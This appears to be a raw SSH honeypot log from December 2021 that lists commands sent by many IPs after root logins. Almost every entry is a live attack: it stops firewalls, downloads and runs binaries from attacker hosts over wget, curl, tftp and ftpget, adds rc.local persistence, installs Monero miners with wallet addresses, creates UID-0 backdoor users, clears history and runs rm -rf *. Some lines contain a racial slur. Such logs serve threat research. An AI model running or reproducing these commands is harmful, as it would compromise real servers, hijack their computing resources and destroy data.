Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 163.197.24.62 1-Dec-2021 01:06:39 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 163.197.8.123 1-Dec-2021 01:11:35 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 31.169.25.190 1-Dec-2021 01:13:06 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 122.233.107.9 1-Dec-2021 01:26:21 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 122.233.107.9 1-Dec-2021 01:28:17 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 122.233.107.9 1-Dec-2021 01:30:13 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 122.233.107.9 1-Dec-2021 01:32:02 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 122.233.107.9 1-Dec-2021 01:33:47 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 122.233.107.9 1-Dec-2021 01:35:33 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 222.186.133.160 1-Dec-2021 15:28:12 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/cqqz;chmod 777 cqqz;./cqqz;echo "cd /tmp/">>/etc/rc.local;echo "./cqqz&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/cqqz
chmod 777 cqqz
./cqqz
echo "cd /tmp/">>/etc/rc.local
echo "./cqqz
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 141.98.10.246 1-Dec-2021 17:28:56 ssh2 root
Exec pkill xmrig; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s; pkill screen
pkill xmrig
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
apt install dos2unix -y
yum install dos2unix -y
curl -O http://206.189.15.231/storytime/a
chmod 777 a
dos2unix a
./a
rm -rf a
history -c
pkill Xorg
pkill cnrig
pkill x86_64
pkill x86
pkill java
pkill python
pkill screen

From 179.43.187.37 1-Dec-2021 22:18:27 ssh2 root
Exec uname -a; hive-passwd presisdenthiveassos12q3; sudo pkill Xorg; sudo pkill x11vnc
uname -a
hive-passwd presisdenthiveassos12q3
sudo pkill Xorg
sudo pkill x11vnc

From 141.98.10.246 1-Dec-2021 22:33:43 ssh2 root
Exec pkill xmrig; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; apt install dos2unix -y; yum install dos2unix -y; curl -O http://206.189.15.231/storytime/a; chmod 777 a; dos2unix a; ./a; rm -rf a; history -c; pkill Xorg; pkill cnrig; pkill x86_64; pkill x86; pkill java; pkill python; pkill screen
pkill xmrig
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
apt install dos2unix -y
yum install dos2unix -y
curl -O http://206.189.15.231/storytime/a
chmod 777 a
dos2unix a
./a
rm -rf a
history -c
pkill Xorg
pkill cnrig
pkill x86_64
pkill x86
pkill java
pkill python
pkill screen

From 193.105.134.45 2-Dec-2021 04:11:07 ssh2 root
apt install dos2unix -y
yum install dos2unix -y
curl -O http://206.189.15.231/storytime/a
chmod 777 a
dos2unix a
./a
rm -rf a
history -c
pkill Xorg
pkill cnrig
pkill x86_64
pkill x86
pkill java
pkill python
pkill screen

From 141.98.10.246 2-Dec-2021 04:15:55 ssh2 root
Exec pkill xmrig; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
pkill xmrig
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
apt install dos2unix -y
yum install dos2unix -y
curl -O http://206.189.15.231/storytime/a
chmod 777 a
dos2unix a
./a
rm -rf a
history -c
pkill Xorg
pkill cnrig
pkill x86_64
pkill x86
pkill java
pkill python
pkill screen

From 107.189.10.234 2-Dec-2021 12:24:59 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://209.141.42.136/xx;chmod 777 xx;./xx;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://209.141.42.136/xx
chmod 777 xx
./xx

From 222.186.133.160 2-Dec-2021 15:57:07 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/org;chmod 777 org;./org;echo "cd /tmp/">>/etc/rc.local;echo "./org&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/org
chmod 777 org
./org
echo "cd /tmp/">>/etc/rc.local
echo "./org
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 119.62.4.69 2-Dec-2021 21:28:26 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s

From 104.248.85.104 2-Dec-2021 23:18:29 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://tigan.cf/sh; curl -O http://tigan.cf/sh; chmod 777 sh; sh sh; tftp tigan.cf -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g tigan.cf; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 tigan.cf .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://tigan.cf/sh
curl -O http://tigan.cf/sh
chmod 777 sh
sh sh
tftp tigan.cf -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g tigan.cf
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 tigan.cf .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://tigan.cf/sh; curl -O http://tigan.cf/sh; chmod 777 sh; sh sh; tftp tigan.cf -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g tigan.cf; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 tigan.cf .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://tigan.cf/sh
curl -O http://tigan.cf/sh
chmod 777 sh
sh sh
tftp tigan.cf -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g tigan.cf
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 tigan.cf .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 107.189.10.234 3-Dec-2021 03:54:10 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://107.189.10.234:8009/Linux2.6;chmod 777 Linux2.6;./Linux2.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://107.189.10.234:8009/Linux2.6
chmod 777 Linux2.6
./Linux2.6

From 209.141.42.136 3-Dec-2021 15:41:49 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://209.141.42.136/xx;chmod 777 xx;./xx;wget -c http://209.141.42.136/xxarm;chmod 777 xxarm;./xxarm;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://209.141.42.136/xx
chmod 777 xx
./xx
wget -c http://209.141.42.136/xxarm
chmod 777 xxarm
./xxarm

From 72.167.48.55 3-Dec-2021 18:17:31 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr

From 209.141.42.136 4-Dec-2021 10:28:23 ssh2 root
Exec cd /tmp;wget http://xia.ddcch4ckserver.top/sysg64.sh;curl -O http://xia.ddcch4ckserver.top/sysg64.sh;chmod 777 sysg64.sh;sh sysg64.sh;
cd /tmp
wget http://xia.ddcch4ckserver.top/sysg64.sh
curl -O http://xia.ddcch4ckserver.top/sysg64.sh
chmod 777 sysg64.sh
sh sysg64.sh
Exec cd /tmp;wget http://xia.ddcch4ckserver.top/sysg64.sh;curl -O http://xia.ddcch4ckserver.top/sysg64.sh;chmod 777 sysg64.sh;sh sysg64.sh;
cd /tmp
wget http://xia.ddcch4ckserver.top/sysg64.sh
curl -O http://xia.ddcch4ckserver.top/sysg64.sh
chmod 777 sysg64.sh
sh sysg64.sh

From 34.142.116.47 5-Dec-2021 10:02:06 ssh2 root
Exec cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://198.46.148.130/wget.sh; curl -O http://198.46.148.130/wget.sh; chmod 777 wget.sh; sh wget.sh; tftp 198.46.148.130 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 198.46.148.130; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 198.46.148.130 ftp.sh ftp.sh; sh ftp.sh; rm -rf wget.sh tftp1.sh tftp2.sh ftp.sh; rm -rf *
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://198.46.148.130/wget.sh
curl -O http://198.46.148.130/wget.sh
chmod 777 wget.sh
sh wget.sh
tftp 198.46.148.130 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 198.46.148.130
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 198.46.148.130 ftp.sh ftp.sh
sh ftp.sh
rm -rf wget.sh tftp1.sh tftp2.sh ftp.sh
rm -rf *

From 213.233.110.162 6-Dec-2021 04:44:18 ssh2 root
w
lscpu
wget fuckyourfuckingshittymommaiknowyouareveryfuckingfrustratedISNTit?ashoole
exit

From 34.76.161.145 6-Dec-2021 10:58:20 ssh2 root
Exec cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://198.46.148.130/wget.sh; curl -O http://198.46.148.130/wget.sh; chmod 777 wget.sh; sh wget.sh; tftp 198.46.148.130 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 198.46.148.130; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 198.46.148.130 ftp.sh ftp.sh; sh ftp.sh; rm -rf wget.sh tftp1.sh tftp2.sh ftp.sh; rm -rf *
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://198.46.148.130/wget.sh
curl -O http://198.46.148.130/wget.sh
chmod 777 wget.sh
sh wget.sh
tftp 198.46.148.130 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 198.46.148.130
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 198.46.148.130 ftp.sh ftp.sh
sh ftp.sh
rm -rf wget.sh tftp1.sh tftp2.sh ftp.sh
rm -rf *

From 59.57.13.243 6-Dec-2021 20:39:39 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://212.71.238.141/stx.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://212.71.238.141/stx.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://212.71.238.141/stx.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://212.71.238.141/stx.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr

From 59.57.13.243 6-Dec-2021 20:42:06 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://212.71.238.141/stx.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://212.71.238.141/stx.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr

From 34.65.49.224 7-Dec-2021 02:07:04 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://130.162.32.102/sora.sh; curl -O http://130.162.32.102/sora.sh; chmod 777 sora.sh; sh sora.sh; tftp 130.162.32.102 -c get sora.sh; chmod 777 sora.sh; sh sora.sh; tftp -r sora2.sh -g 130.162.32.102; chmod 777 sora2.sh; sh sora2.sh; ftpget -v -u anonymous -p anonymous -P 21 130.162.32.102 sora1.sh sora1.sh; sh sora1.sh; rm -rf sora.sh sora.sh sora2.sh sora1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://130.162.32.102/sora.sh
curl -O http://130.162.32.102/sora.sh
chmod 777 sora.sh
sh sora.sh
tftp 130.162.32.102 -c get sora.sh
chmod 777 sora.sh
sh sora.sh
tftp -r sora2.sh -g 130.162.32.102
chmod 777 sora2.sh
sh sora2.sh
ftpget -v -u anonymous -p anonymous -P 21 130.162.32.102 sora1.sh sora1.sh
sh sora1.sh
rm -rf sora.sh sora.sh sora2.sh sora1.sh
rm -rf *

From 34.159.156.34 7-Dec-2021 03:50:33 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://130.162.32.102/sora.sh; curl -O http://130.162.32.102/sora.sh; chmod 777 sora.sh; sh sora.sh; tftp 130.162.32.102 -c get sora.sh; chmod 777 sora.sh; sh sora.sh; tftp -r sora2.sh -g 130.162.32.102; chmod 777 sora2.sh; sh sora2.sh; ftpget -v -u anonymous -p anonymous -P 21 130.162.32.102 sora1.sh sora1.sh; sh sora1.sh; rm -rf sora.sh sora.sh sora2.sh sora1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://130.162.32.102/sora.sh
curl -O http://130.162.32.102/sora.sh
chmod 777 sora.sh
sh sora.sh
tftp 130.162.32.102 -c get sora.sh
chmod 777 sora.sh
sh sora.sh
tftp -r sora2.sh -g 130.162.32.102
chmod 777 sora2.sh
sh sora2.sh
ftpget -v -u anonymous -p anonymous -P 21 130.162.32.102 sora1.sh sora1.sh
sh sora1.sh
rm -rf sora.sh sora.sh sora2.sh sora1.sh
rm -rf *

From 141.98.10.246 7-Dec-2021 05:00:34 ssh2 root
Exec pkill xmrig; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
pkill xmrig
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 141.98.10.246 7-Dec-2021 05:02:30 ssh2 root
Exec pkill xmrig; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
pkill xmrig
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
apt install dos2unix -y
yum install dos2unix -y
curl -O http://141.98.10.246/storytime/a
chmod 777 a
dos2unix a
./a
rm -rf a
history -c
pkill Xorg
pkill cnrig
pkill x86_64
pkill x86
pkill java
pkill python
pkill screen

From 141.98.10.246 7-Dec-2021 11:10:00 ssh2 root
Exec pkill xmrig; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s; pkill screen
pkill xmrig
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 45.61.186.166 7-Dec-2021 11:10:01 ssh2 root
apt install dos2unix -y
yum install dos2unix -y
curl -O http://141.98.10.246/storytime/a
chmod 777 a
dos2unix a
./a
rm -rf a
history -c
pkill Xorg
pkill cnrig
pkill x86_64
pkill x86
pkill java
pkill python
pkill screen

From 103.78.154.20 7-Dec-2021 13:45:09 ssh2 root
Exec echo -en "\\x31\\x33\\x33\\x37"
echo -en "\\x31\\x33\\x33\\x37"

From 205.185.114.149 7-Dec-2021 23:22:51 ssh2 root
Exec rm x86_64; wget http://205.185.121.185/x86_64; chmod 777 *; ./x86_64 nigga; rm x86_64
rm x86_64
wget http://205.185.121.185/x86_64
chmod 777 *
./x86_64 nigga
rm x86_64

From 222.186.133.160 8-Dec-2021 15:10:41 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/maaz;chmod 777 maaz;./maaz;echo "cd /tmp/">>/etc/rc.local;echo "./maaz&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/maaz
chmod 777 maaz
./maaz
echo "cd /tmp/">>/etc/rc.local
echo "./maaz
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 141.98.10.246 9-Dec-2021 03:12:40 ssh2 root
Exec pkill xmrig; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s; pkill screen
pkill xmrig
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
apt install dos2unix -y
yum install dos2unix -y
curl -O http://141.98.10.246/storytime/a
chmod 777 a
dos2unix a
./a
rm -rf a
history -c
pkill Xorg
pkill cnrig
pkill x86_64
pkill x86
pkill java
pkill python
pkill screen

From 136.144.41.139 9-Dec-2021 03:46:49 ssh2 root
Exec curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 45dNkjTQGgT77r9AEMyHdCGan5tpuekXaHFhFW99dQ8hUS35oZQEYXddFE52jxVdfUNrAD4ZyZ44BgHfgk5SjHdoLjGdJnQ
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 45dNkjTQGgT77r9AEMyHdCGan5tpuekXaHFhFW99dQ8hUS35oZQEYXddFE52jxVdfUNrAD4ZyZ44BgHfgk5SjHdoLjGdJnQ

From 141.98.10.246 9-Dec-2021 07:02:23 ssh2 root
Exec pkill xmrig; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; apt install dos2unix -y; yum install dos2unix -y; curl -O http://141.98.10.246/storytime/a; chmod 777 a; dos2unix a; ./a; rm -rf a; history -c; pkill Xorg; pkill cnrig; pkill x86_64; pkill x86; pkill java; pkill python; pkill screen
pkill xmrig
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
apt install dos2unix -y
yum install dos2unix -y
curl -O http://141.98.10.246/storytime/a
chmod 777 a
dos2unix a
./a
rm -rf a
history -c
pkill Xorg
pkill cnrig
pkill x86_64
pkill x86
pkill java
pkill python
pkill screen

From 5.196.239.157 10-Dec-2021 14:40:41 ssh2 root
Exec lscpu
lscpu

From 178.128.209.47 11-Dec-2021 09:01:57 ssh2 root
Exec (cd /tmp; wget -qO - 199.192.19.108:2202/oo|perl; curl -s 199.192.19.108:2202/oo|perl > /dev/null)
(cd /tmp
wget -qO - 199.192.19.108:2202/oo|perl
curl -s 199.192.19.108:2202/oo|perl > /dev/null)

From 137.220.194.61 12-Dec-2021 16:10:38 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://137.220.194.61/dos64;curl -O http://137.220.194.61/dos64;chmod 777 dos64;./dos64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://137.220.194.61/dos64
curl -O http://137.220.194.61/dos64
chmod 777 dos64
./dos64

From 196.28.245.102 12-Dec-2021 16:32:49 ssh2 root
ls
w
free -g

From 90.223.103.4 12-Dec-2021 16:33:19 ssh2 root
free -g
/usr/sbin/useradd -o -u 0 -g 0 r00t -p admin1234
/usr/sbin/useradd -o -u 0 -g 0 .test -p admin1234 passwd root
passwd r00t
passwd .test
paswd
curl -O http://130.0.164.120/iscan.jpg

From 188.166.60.8 12-Dec-2021 22:13:43 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://tigan.cf/sh; curl -O http://tigan.cf/sh; chmod 777 sh; sh sh; tftp tigan.cf -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g tigan.cf; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 tigan.cf .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://tigan.cf/sh
curl -O http://tigan.cf/sh
chmod 777 sh
sh sh
tftp tigan.cf -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g tigan.cf
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 tigan.cf .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 188.166.60.8 12-Dec-2021 23:42:27 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://tigan.cf/sh; curl -O http://tigan.cf/sh; chmod 777 sh; sh sh; tftp tigan.cf -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g tigan.cf; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 tigan.cf .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://tigan.cf/sh
curl -O http://tigan.cf/sh
chmod 777 sh
sh sh
tftp tigan.cf -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g tigan.cf
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 tigan.cf .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 137.220.194.61 13-Dec-2021 01:23:56 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -chttp://137.220.194.61/dos64;curl -O http://137.220.194.61/dos64;chmod 777 dos64;./dos64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -chttp://137.220.194.61/dos64
curl -O http://137.220.194.61/dos64
chmod 777 dos64
./dos64
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -chttp://137.220.194.61/dos64;curl -O http://137.220.194.61/dos64;chmod 777 dos64;./dos64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -chttp://137.220.194.61/dos64
curl -O http://137.220.194.61/dos64
chmod 777 dos64
./dos64

From 107.189.30.134 13-Dec-2021 21:54:25 ssh2 root
Exec rm -rf x86*; wget http://205.185.121.185/x86_64; chmod 777 *; ./x86_64 nigga; rm -rf ~/c3pool; pkill xmrig; pkill xmr; pkill cnrig; cd /tmp; wget http://107.189.30.134/cnrig; chmod 777 cnrig; wget http://107.189.30.134/config.json; chmod 777 config.json; ./cnrig
rm -rf x86*
wget http://205.185.121.185/x86_64
chmod 777 *
./x86_64 nigga
rm -rf ~/c3pool
pkill xmrig
pkill xmr
pkill cnrig
cd /tmp
wget http://107.189.30.134/cnrig
chmod 777 cnrig
wget http://107.189.30.134/config.json
chmod 777 config.json
./cnrig

From 107.189.30.134 15-Dec-2021 02:28:41 ssh2 root
Exec rm -rf x86*; wget http://205.185.121.185/x86_64; chmod 777 *; ./x86_64 nigga; rm -rf ~/c3pool; pkill xmrig; pkill xmr; pkill cnrig; cd /tmp; wget http://107.189.30.134/cnrig; chmod 777 cnrig; wget http://107.189.30.134/config.json; chmod 777 config.json; ./cnrig
rm -rf x86*
wget http://205.185.121.185/x86_64
chmod 777 *
./x86_64 nigga
rm -rf ~/c3pool
pkill xmrig
pkill xmr
pkill cnrig
cd /tmp
wget http://107.189.30.134/cnrig
chmod 777 cnrig
wget http://107.189.30.134/config.json
chmod 777 config.json
./cnrig

